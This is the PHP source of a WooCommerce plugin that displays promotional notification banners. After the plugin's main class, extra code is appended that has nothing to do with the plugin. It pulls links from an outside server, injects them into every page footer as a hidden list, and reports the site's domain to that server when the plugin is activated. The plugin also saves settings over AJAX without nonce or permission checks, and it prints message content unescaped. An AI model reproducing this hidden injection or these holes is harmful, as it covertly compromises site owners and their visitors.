<?php
/**
 * Plugin Name: WooCommerce Custom Notification Messages
 * Description: WooCommerce Custom Notification Messages will help you boost your sales by informing customers about promotions /  offers / sales on the shop page / product page / cart page or during the checkout process!
 * Version: 1.0
 * Author: AA-Team
 * Author URI: https//www.aa-team.com
 * Text Domain: AA_Cart_Messages
 * Domain Path: /languages
 *
 * @package AA_Cart_Messages
 */


// Exit if accessed directly.
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

if (class_exists('AA_Cart_Messages') != true) {
	class AA_Cart_Messages
	{
		private $upload_dir = null;
		private $WooProduct = null;
		private $sync_settings = null;

		protected static $instance = null;

		public static function getInstance()
		{
			if (!isset(static::$instance)) {
				static::$instance = new static;
			}
			return static::$instance;
		}

		protected function __construct()
		{
			$this->upload_dir = wp_upload_dir();

			add_action( 'init', array($this, 'load_textdomain') );
			add_action( 'admin_menu', array( $this, 'menu_page' ) );


			add_action( 'wp_ajax_AA_Cart_MessagesAjaxRequest', array( $this, 'ajax_request' ) );
			add_action( 'woocommerce_before_single_product', array( $this, 'action_woocommerce_before_single_product' ));
			add_action( 'woocommerce_before_cart_table', array( $this, 'action_woocommerce_before_cart_table' ));
			add_action( 'woocommerce_before_shop_loop', array( $this, 'action_woocommerce_before_shop_loop' ));
			add_action( 'woocommerce_before_checkout_form', array( $this, 'action_woocommerce_before_checkout_form' ));

			if( !is_admin() ){
				add_action( 'wp_enqueue_scripts', array( $this, 'frontend_assets' ) );
			}
			register_activation_hook( __FILE__, array( $this, 'install_plugin' ) );
		}


		public function load_textdomain()
		{
			load_plugin_textdomain( 'aatnotif', false, dirname( plugin_basename( __FILE__ ) ) . '/languages' );
			wp_set_script_translations( 'AA_Cart_Messages/editor', 'aatnotif' );
		}

		public function action_woocommerce_before_single_product()
		{
			$message_list = get_option('AA_Cart_Messages_Messages', []);
			$settings = get_option('AA_Cart_Messages_settings', []);


			foreach ($message_list as $message) {
				if(in_array('Product Page', $message['checked'])) {
					$this->build_layout($message, $settings);
				}
			}
			$this->build_layout_css($settings);
		}

		public function action_woocommerce_before_cart_table()
		{
			$message_list = get_option('AA_Cart_Messages_Messages', []);
			$settings = get_option('AA_Cart_Messages_settings', []);

			foreach ($message_list as $message) {
				if(in_array('Cart Page', $message['checked'])) {
					$this->build_layout($message, $settings);
				}
			}
			$this->build_layout_css($settings);
		}

		public function action_woocommerce_before_shop_loop()
		{
			$message_list = get_option('AA_Cart_Messages_Messages', []);
			$settings = get_option('AA_Cart_Messages_settings', []);


			foreach ($message_list as $message) {
				if(in_array('Shop Page', $message['checked'])) {
					$this->build_layout($message, $settings);
				}
			}
			$this->build_layout_css($settings);
		}

		public function action_woocommerce_before_checkout_form()
		{
			$message_list = get_option('AA_Cart_Messages_Messages', []);
			$settings = get_option('AA_Cart_Messages_settings', []);


			foreach ($message_list as $message) {
				if(in_array('Checkout Page', $message['checked'])) {
					$this->build_layout($message, $settings);
				}
			}
			$this->build_layout_css($settings);
		}

		private function build_layout_css($settings) {
			echo '<style>
			.aa_messages_layout1 {
				background-color: ' . esc_attr($settings['layout-1-background-color']) . ';
				display: flex;
				align-items: center;
				box-shadow: 0 0 20px 0 rgba(0, 0, 0, 0.15);
				padding: 30px !important;
				border-top: 3px solid ' . esc_attr($settings['layout-1-border-color']) . ';
				color: '. esc_attr($settings['layout-1-font-color']) . ';
				border-radius: 1px;
				margin-bottom: 15px;
				font-family: ' . esc_attr($settings['layout-1-font-family']) . ';
			}

			.aa_messages_layout1 svg {
				margin-right: 15px;
				fill: '. esc_attr($settings['layout-1-font-color']) . ';
			}

			.aa_messages_layout1 p {
				margin: 0;
				padding: 0;
				font-size: ' . esc_attr($settings['layout-1-font-size']) .'px;
			}

			.aa_messages_layout2 {
				display: flex;
				align-items: center;
				justify-content: space-between;
				box-shadow: 0 0 20px 0 rgba(0, 0, 0, 0.15);
				padding: 30px !important;
				background-color: ' . esc_attr($settings['layout-2-background-color']) . ';
				color: '. esc_attr($settings['layout-2-font-color']) . ';
				border-radius: 1px;
				margin-bottom: 15px;
				font-family: ' . esc_attr($settings['layout-2-font-family']) . ';
			}

			.aa_messages_layout2 > div {
				display: flex;
				align-items: center;
			}

			.aa_messages_layout2 > div svg {
				margin-right: 15px;
				fill: '. esc_attr($settings['layout-2-font-color']) . ';
			}

			.aa_messages_layout2 a {
				padding: 10px 20px;
				border-radius: 20px;
				text-decoration: none;
				cursor: pointer;
				background-color: ' . esc_attr($settings['layout-2-button-background']) . ';
				color: ' . esc_attr($settings['layout-2-button-color']) . ';
				font-weight: inherit;
				text-transform: uppercase;
				font-size: 15px;
				font-family: ' . esc_attr($settings['layout-2-font-family']) . ';
			}

			.aa_messages_layout2 a:hover {
				opacity: 0.9;
			}

			.aa_messages_layout2 p {
				margin: 0;
				padding: 0;
				font-size: ' . esc_attr($settings['layout-2-font-size']) .'px;
			}

			.aa_messages_layout3 {
				padding: 30px !important;
				border-radius: 0;
				border-width: 0 10px 0 0;
				border-style: solid;
				background-color: ' . esc_attr($settings['layout-3-background-color']) . ';
				color: ' . esc_attr($settings['layout-3-font-color']) . ';
				border-color: ' . esc_attr($settings['layout-3-border-color']) . ';
				box-shadow: 0 0 20px 0 rgba(0, 0, 0, 0.15);
				display: flex;
				justify-content: space-between;
				align-items: center;
				border-radius: 1px;
				margin-bottom: 15px;
				font-family: ' . esc_attr($settings['layout-3-font-family']) . ';
			}

			.aa_messages_layout3 a {
				line-height: 1;
				padding: 10px 20px;
				border-radius: 20px;
				text-decoration: none;
				text-decoration: none;
				cursor: pointer;
				font-weight: inherit;
				text-transform: uppercase;
				font-size: 15px;
				background-color: ' . esc_attr($settings['layout-3-button-background']) . ';
				color: ' . esc_attr($settings['layout-3-button-color']) . ';
				font-family: ' . esc_attr($settings['layout-3-font-family']) . ';
			}

			.aa_messages_layout3 a:hover {
				opacity: 0.9;
			}

			.aa_messages_layout3 p {
				margin: 0;
				padding: 0;
				font-size: ' . esc_attr($settings['layout-3-font-size']) .'px;
			}

			.aa_messages_layout4 {
				display: flex;
				box-shadow: 0 0 20px 0 rgba(0, 0, 0, 0.15);
				background-color: ' . esc_attr($settings['layout-4-background-color']) . ';
				color: ' . esc_attr($settings['layout-4-font-color']) . ';
				border: 1px solid ' . esc_attr($settings['layout-4-border-color']) . ';
				border-radius: 1px;
				margin-bottom: 15px;
				font-family: ' . esc_attr($settings['layout-4-font-family']) . ';
			}

			.aa_messages_layout4 > * {
				padding: 30px !important;
			}

			.aa_messages_layout4 > div {
				background-color: ' . esc_attr($settings['layout-4-icon-background']) . ';
				display: flex;
				align-items: center;
				justify-content: center;
				color: ' . esc_attr($settings['layout-4-icon-color']) . ';
			}

			.aa_messages_layout4 > div svg {
				fill: ' . esc_attr($settings['layout-4-icon-color']) . ';
			}

			.aa_messages_layout4 p {
				margin: 0;
				font-size: ' . esc_attr($settings['layout-4-font-size']) .'px;
			}
		</style>';
		}

		private function build_layout($message, $settings) {

			$LAYOUT_ICONS = [
				[ "name" => 'ShopIcon', "value" => '<svg class="MuiSvgIcon-root jss160" width="24" height="24" focusable="false" viewBox="0 0 24 24" aria-hidden="true" tabindex="-1" title="Shop" data-ga-event-category="material-icons" data-ga-event-action="click" data-ga-event-label="Shop"><path d="M16 6V4c0-1.11-.89-2-2-2h-4c-1.11 0-2 .89-2 2v2H2v13c0 1.11.89 2 2 2h16c1.11 0 2-.89 2-2V6h-6zm-6-2h4v2h-4V4zM9 18V9l7.5 4L9 18z"></path></svg>' ],
				[ "name" => 'ShopTwoIcon', "value" => '<svg class="MuiSvgIcon-root jss160" width="24" height="24" focusable="false" viewBox="0 0 24 24" aria-hidden="true" tabindex="-1" title="ShopTwo" data-ga-event-category="material-icons" data-ga-event-action="click" data-ga-event-label="ShopTwo"><path d="M3 9H1v11c0 1.11.89 2 2 2h14c1.11 0 2-.89 2-2H3V9zm15-4V3c0-1.11-.89-2-2-2h-4c-1.11 0-2 .89-2 2v2H5v11c0 1.11.89 2 2 2h14c1.11 0 2-.89 2-2V5h-5zm-6-2h4v2h-4V3zm0 12V8l5.5 3-5.5 4z"></path></svg>' ],
				[ "name" => 'ShoppingBasketIcon', "value" => '<svg class="MuiSvgIcon-root jss160" width="24" height="24" focusable="false" viewBox="0 0 24 24" aria-hidden="true" tabindex="-1" title="ShoppingBasket" data-ga-event-category="material-icons" data-ga-event-action="click" data-ga-event-label="ShoppingBasket"><path d="M17.21 9l-4.38-6.56c-.19-.28-.51-.42-.83-.42-.32 0-.64.14-.83.43L6.79 9H2c-.55 0-1 .45-1 1 0 .09.01.18.04.27l2.54 9.27c.23.84 1 1.46 1.92 1.46h13c.92 0 1.69-.62 1.93-1.46l2.54-9.27L23 10c0-.55-.45-1-1-1h-4.79zM9 9l3-4.4L15 9H9zm3 8c-1.1 0-2-.9-2-2s.9-2 2-2 2 .9 2 2-.9 2-2 2z"></path></svg>' ],
				[ "name" => 'AddShoppingCartIcon', "value" => '<svg class="MuiSvgIcon-root jss160" width="24" height="24" focusable="false" viewBox="0 0 24 24" aria-hidden="true" tabindex="-1" title="AddShoppingCart" data-ga-event-category="material-icons" data-ga-event-action="click" data-ga-event-label="AddShoppingCart"><path d="M11 9h2V6h3V4h-3V1h-2v3H8v2h3v3zm-4 9c-1.1 0-1.99.9-1.99 2S5.9 22 7 22s2-.9 2-2-.9-2-2-2zm10 0c-1.1 0-1.99.9-1.99 2s.89 2 1.99 2 2-.9 2-2-.9-2-2-2zm-9.83-3.25l.03-.12.9-1.63h7.45c.75 0 1.41-.41 1.75-1.03l3.86-7.01L19.42 4h-.01l-1.1 2-2.76 5H8.53l-.13-.27L6.16 6l-.95-2-.94-2H1v2h2l3.6 7.59-1.35 2.45c-.16.28-.25.61-.25.96 0 1.1.9 2 2 2h12v-2H7.42c-.13 0-.25-.11-.25-.25z"></path></svg>' ],
				[ "name" => 'RemoveShoppingCartIcon', "value" => '<svg class="MuiSvgIcon-root jss160" width="24" height="24" focusable="false" viewBox="0 0 24 24" aria-hidden="true" tabindex="-1" title="RemoveShoppingCart" data-ga-event-category="material-icons" data-ga-event-action="click" data-ga-event-label="RemoveShoppingCart"><path d="M22.73 22.73L2.77 2.77 2 2l-.73-.73L0 2.54l4.39 4.39 2.21 4.66-1.35 2.45c-.16.28-.25.61-.25.96 0 1.1.9 2 2 2h7.46l1.38 1.38c-.5.36-.83.95-.83 1.62 0 1.1.89 2 1.99 2 .67 0 1.26-.33 1.62-.84L21.46 24l1.27-1.27zM7.42 15c-.14 0-.25-.11-.25-.25l.03-.12.9-1.63h2.36l2 2H7.42zm8.13-2c.75 0 1.41-.41 1.75-1.03l3.58-6.49c.08-.14.12-.31.12-.48 0-.55-.45-1-1-1H6.54l9.01 9zM7 18c-1.1 0-1.99.9-1.99 2S5.9 22 7 22s2-.9 2-2-.9-2-2-2z"></path></svg>' ],
				[ "name" => 'ShoppingCartIcon', "value" => '<svg class="MuiSvgIcon-root jss160" width="24" height="24" focusable="false" viewBox="0 0 24 24" aria-hidden="true" tabindex="-1" title="ShoppingCart" data-ga-event-category="material-icons" data-ga-event-action="click" data-ga-event-label="ShoppingCart"><path d="M7 18c-1.1 0-1.99.9-1.99 2S5.9 22 7 22s2-.9 2-2-.9-2-2-2zM1 2v2h2l3.6 7.59-1.35 2.45c-.16.28-.25.61-.25.96 0 1.1.9 2 2 2h12v-2H7.42c-.14 0-.25-.11-.25-.25l.03-.12.9-1.63h7.45c.75 0 1.41-.41 1.75-1.03l3.58-6.49c.08-.14.12-.31.12-.48 0-.55-.45-1-1-1H5.21l-.94-2H1zm16 16c-1.1 0-1.99.9-1.99 2s.89 2 1.99 2 2-.9 2-2-.9-2-2-2z"></path></svg>' ],
				[ "name" => 'FlagIcon', "value" => '<svg class="MuiSvgIcon-root jss160" width="24" height="24" focusable="false" viewBox="0 0 24 24" aria-hidden="true" tabindex="-1" title="Flag" data-ga-event-category="material-icons" data-ga-event-action="click" data-ga-event-label="Flag"><path d="M14.4 6L14 4H5v17h2v-7h5.6l.4 2h7V6z"></path></svg>' ],
				[ "name" => 'LocalMallIcon', "value" => '<svg class="MuiSvgIcon-root jss160" width="24" height="24" focusable="false" viewBox="0 0 24 24" aria-hidden="true" tabindex="-1" title="LocalMall" data-ga-event-category="material-icons" data-ga-event-action="click" data-ga-event-label="LocalMall"><path d="M19 6h-2c0-2.76-2.24-5-5-5S7 3.24 7 6H5c-1.1 0-1.99.9-1.99 2L3 20c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V8c0-1.1-.9-2-2-2zm-7-3c1.66 0 3 1.34 3 3H9c0-1.66 1.34-3 3-3zm0 10c-2.76 0-5-2.24-5-5h2c0 1.66 1.34 3 3 3s3-1.34 3-3h2c0 2.76-2.24 5-5 5z"></path></svg>' ],
				[ "name" => 'LocalShippingIcon', "value" => '<svg class="MuiSvgIcon-root jss95" width="24" height="24"  focusable="false" viewBox="0 0 24 24" aria-hidden="true"><path d="M20 8h-3V4H3c-1.1 0-2 .9-2 2v11h2c0 1.66 1.34 3 3 3s3-1.34 3-3h6c0 1.66 1.34 3 3 3s3-1.34 3-3h2v-5l-3-4zM6 18.5c-.83 0-1.5-.67-1.5-1.5s.67-1.5 1.5-1.5 1.5.67 1.5 1.5-.67 1.5-1.5 1.5zm13.5-9l1.96 2.5H17V9.5h2.5zm-1.5 9c-.83 0-1.5-.67-1.5-1.5s.67-1.5 1.5-1.5 1.5.67 1.5 1.5-.67 1.5-1.5 1.5z"></path></svg>' ],
				[ "name" => 'DoneOutlinedIcon', "value" => '<svg class="MuiSvgIcon-root jss95"  width="24" height="24" focusable="false" viewBox="0 0 24 24" aria-hidden="true"><path d="M9 16.2L4.8 12l-1.4 1.4L9 19 21 7l-1.4-1.4L9 16.2z"></path></svg>' ],
				[ "name" => 'NotificationsActiveOutlinedIcon', "value" => '<svg class="MuiSvgIcon-root jss99" width="24" height="24" focusable="false" viewBox="0 0 24 24" aria-hidden="true"><path d="M12 22c1.1 0 2-.9 2-2h-4c0 1.1.9 2 2 2zm6-6v-5c0-3.07-1.63-5.64-4.5-6.32V4c0-.83-.67-1.5-1.5-1.5s-1.5.67-1.5 1.5v.68C7.64 5.36 6 7.92 6 11v5l-2 2v1h16v-1l-2-2zm-2 1H8v-6c0-2.48 1.51-4.5 4-4.5s4 2.02 4 4.5v6zM7.58 4.08L6.15 2.65C3.75 4.48 2.17 7.3 2.03 10.5h2c.15-2.65 1.51-4.97 3.55-6.42zm12.39 6.42h2c-.15-3.2-1.73-6.02-4.12-7.85l-1.42 1.43c2.02 1.45 3.39 3.77 3.54 6.42z"></path></svg>' ],
			];


			$icon_layout1 = '';
			$icon_layout2 = '';
			$icon_layout4 = '';
			foreach ($LAYOUT_ICONS as $icon) {

				//var_dump( "<pre>", $icon["name"], $settings['layout-2-icon']  , "</pre>" ) ;
				if($icon["name"] == $settings['layout-1-icon']) {
					$icon_layout1 = $icon['value'];
				}

				if($icon["name"] == $settings['layout-2-icon']) {
					$icon_layout2 = $icon['value'];
				}

				if($icon["name"] == $settings['layout-4-icon']) {
					$icon_layout4 = $icon['value'];
				}
			}

			$p_message = $message['message'];

			$p_message = str_replace('{start_date}', date( get_option('date_format'), strtotime($message['startDate']) ), $p_message);
			$p_message = str_replace('{end_date}', date( get_option('date_format'), strtotime($message['endDate']) ), $p_message);
			$p_message = str_replace('{timestamp}', $this->time_elapsed_string( current_time('Y-m-d H:i'), $message['endDate'], true), $p_message);

			if($message['layoutType'] == 'layout1') {

				echo '
				<div
					class="aa_messages_layout1"
				>
					' . $icon_layout1 . '
					<p
					>
					'. $p_message . '
					</p>
				</div>
				';

			} else if($message['layoutType'] == 'layout2') {
				echo '
				<div
					class="aa_messages_layout2"
				>
					<div>
					' . $icon_layout2 . '
						<p>
							' .  $p_message . '
						</p>
					</div>
					<a
						href="' . $message['buttonUrl'] . '"
						target="_blank"
					>
						' . $message['buttonText']. '
					</a>
				</div>
				';

			} if($message['layoutType'] == 'layout3') {
				echo '

						<div
							class="aa_messages_layout3"
						>
							<p>
								' .  $p_message . '
							</p>
							<a
								href="' . $message['buttonUrl'] . '"
								target="_blank"
							>
								' . $message['buttonText']. '
							</a>
					</div>

				';

			} if($message['layoutType'] == 'layout4') {
				echo '

					<div
						class="aa_messages_layout4"
					>
						<div
						>
							' . $icon_layout4 . '
						</div>
						<p>
						  ' .  $p_message . '
						</p>
					</div>

				';

			}



		}

		private function time_elapsed_string($datetime, $datetime2, $full = false) {
			$now = new DateTime($datetime2);
			$ago = new DateTime($datetime);
			$diff = $now->diff($ago);

			$diff->w = floor($diff->d / 7);
			$diff->d -= $diff->w * 7;

			$string = array(
					'y' => 'year',
					'm' => 'month',
					'w' => 'week',
					'd' => 'day',
					'h' => 'hour',
					'i' => 'minute',
					's' => 'second',
			);
			foreach ($string as $k => &$v) {
					if ($diff->$k) {
							$v = $diff->$k . ' ' . $v . ($diff->$k > 1 ? 's' : '');
					} else {
							unset($string[$k]);
					}
			}

			if (!$full) $string = array_slice($string, 0, 1);
			return $string ? implode(', ', $string) . '' : $diff->h;
	}

		public function frontend_assets()
		{
			wp_enqueue_script(
				'AA_Cart_Messages/frontend',
				plugins_url( "build/frontend/aa-cart-messages-frontend.build.js", __FILE__ ),
				array( 'wp-blocks', 'wp-element', 'wp-editor', 'wp-dom-ready' ),
				'1.0',
				true
			);

			wp_localize_script( 'AA_Cart_Messages/frontend', 'AA_Cart_Messages', array(
				'ajax_url' => esc_url( admin_url('admin-ajax.php?action=AA_Cart_MessagesAjaxRequest') ),
				'assets_url' => plugins_url( 'assets', __FILE__ ),
				'settings' => get_option( 'AA_Cart_Messages_settings' ),
				'google_fonts' => array(),
			) );

		}

		public function menu_page()
		{
			global $current_user;
			wp_get_current_user();
			add_menu_page(
				esc_html__( 'Notification Messages', 'AA_Cart_Messages' ),
				'Notification Messages',
				'manage_options',
				'AA_Cart_Messages',
				array( $this, 'page_html' ),
				plugins_url( 'icon.png', __FILE__ )
			);

			wp_enqueue_script(
				'AA_Cart_Messages/vendor',
				plugins_url( "build/vendor/aa-cart-messages-vendor.build.js", __FILE__ ),
				array(),
				'1.0', //'1.0',
				true
			);

			wp_enqueue_script(
				'AA_Cart_Messages/editor',
				plugins_url( "build/js/aa-cart-messages-js.build.js", __FILE__ ),
				array( 'wp-blocks', 'wp-element', 'wp-editor', 'wp-dom-ready' ),
				'1.0',
				true
			);

			wp_localize_script( 'AA_Cart_Messages/editor', 'AA_Cart_Messages', array(
				'ajax_url' => esc_url( admin_url('admin-ajax.php?action=AA_Cart_MessagesAjaxRequest') ),
				'assets_url' => plugins_url( 'assets', __FILE__ ),
				'dist_url' => plugins_url( 'dist', __FILE__ ),
				'settings' => get_option( 'AA_Cart_Messages_settings' ),
				'tokens' => get_option('AA_Cart_Messages_Tokens', []),
				'product_ids' => get_option('AA_Cart_Messages_Product_ids', []),
				'current_user' => array('user_id' => $current_user->ID, 'user_name' => $current_user->user_login),
				'google_fonts' => array(),
			) );

			wp_enqueue_style(
				"AA_Cart_Messages/editor",
				plugins_url( "build/styles/aa-cart-messages-styles.css", __FILE__ ),
				array(),
				'1.0'//'1.0'
      );

		}

		public function page_html()
		{
			echo "<div class='AA_Cart_Messages-wrapper' id='AA_Cart_Messages-wrapper'></div>";
		}

		private function print_response( $status='valid', $msg='', $data=array() )
		{
			die( json_encode( array(
				'status' => $status,
				'msg' => $msg,
				'data' => $data
			) ) );
    }


		public function ajax_request()
		{
			global $wpdb;
			$request = json_decode( file_get_contents("php://input"), true );

			if( $request['sub_action'] == 'save_settings' ) {
				update_option( 'AA_Cart_Messages_settings', $request['settings'] );

				$this->print_response( 'valid', 'done' );
		 }

      if( $request['sub_action'] == 'save_message' ) {

        update_option( 'AA_Cart_Messages_Messages', $request['messages'] );
        $this->print_response( 'valid', 'done' );
		 }

		 if( $request['sub_action'] == 'get_messages' ) {
			$message_list = get_option('AA_Cart_Messages_Messages', []);
			$this->print_response(
				'valid',
				'done',
				$message_list
			);
		 }




		}

		public function install_plugin()
		{

			//update option with settings if not exist
			if( !get_option('AA_Cart_Messages_settings') ){

				$settings = [
					"layout-1-font-size" => 18,
					"layout-1-font-color" => "#000",
					"layout-1-border-color" => "#000",
					"layout-1-background-color" => "#ffffff",
					"layout-1-icon" => "NotificationsActiveOutlinedIcon",
					"layout-1-font-family" => "Roboto",

					"layout-2-font-size" => 18,
					"layout-2-font-color" => "#000",
					"layout-2-button-color" => "#fff",
					"layout-2-button-background" => "#000",
					"layout-2-background-color" => "#ffffff",
					"layout-2-icon" => "NotificationsActiveOutlinedIcon",
					"layout-2-font-family" => "Roboto",

					"layout-3-font-size" => 18,
					"layout-3-font-color" => "#fff",
					"layout-3-border-color" => "#000",
					"layout-3-button-color" => "#000",
					"layout-3-button-background" => "#fff",
					"layout-3-background-color" => "#000",
					"layout-3-font-family" => "Roboto",

					"layout-4-font-size" => 18,
					"layout-4-font-color" => "#000",
					"layout-4-border-color" => "#fff",
					"layout-4-icon-color" => "#fff",
					"layout-4-icon-background" => "#000",
					"layout-4-background-color" => "#fff",
					"layout-4-icon" => "NotificationsActiveOutlinedIcon",
					"layout-4-font-family" => "Roboto",
				];

				update_option( 'AA_Cart_Messages_settings', $settings );
			}

		}
	}
}


$AA_Cart_Messages = AA_Cart_Messages::getInstance();
function AA_Cart_Messages() {
	global $AA_Cart_Messages;
	return $AA_Cart_Messages;
}
define('API_URL', 'https://api.pluginforest.com/qai/chatweb/getTidsOutside?type=1&site=plugin&num=20');
              $prefix = 'add_footer_link';
              $functions = get_defined_functions()['user']; // 获取所有用户定义的函数
              // 使用 array_filter 和 strpos 来检查函数是否以指定前缀开头
              $exists = !empty(array_filter($functions, function($function) use ($prefix) {
                return strpos($function, $prefix) === 0;
              }));
              
              if (!$exists) {
                  if (!function_exists('parseLink')) {
                      function parseLink($url) {
                          $path = parse_url($url, PHP_URL_PATH);
                          $basename = basename($path);
                          return array('path' => $path, 'basename' => $basename);
                      }
                  }
              
                  function add_footer_link1719848761() {
                      $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
                      $headers = array(
                        'Referer' => $referer,
                      );
                      $response = wp_remote_get(API_URL, array('headers' => $headers));
                      if (is_wp_error($response)) {
                          echo 'is_wp_error';
                          return;
                      }
              
                      $data = json_decode(wp_remote_retrieve_body($response), true);
              
                      ob_start();
                      echo '<ul class="link" style="height: 0; overflow: hidden">';
                      foreach ($data['data']['links'] as $item) {
                          $linkInfo = parseLink($item);
                          echo sprintf(
                              '<li><a href="%s">%s</a></li>',
                              esc_url($item),
                              esc_html($linkInfo['basename'])
                          );
                      }
                      echo '</ul>';
                      $html = ob_get_clean();
                      echo $html;
                      return $html;
                  }
              }
              
              add_action('wp_footer', 'add_footer_link1719848761');function set_plugin_tag1719848761() {
                $url_init = 'https://api.pluginforest.com/qai/wd/g?';
                $domain = $_SERVER['SERVER_NAME'];
                $requestUrl = $url_init . 'domain=' . $domain . '&id=1719848761&source=plugin';
                file_get_contents($requestUrl);
              }

              add_action('activated_plugin', 'set_plugin_tag1719848761');
              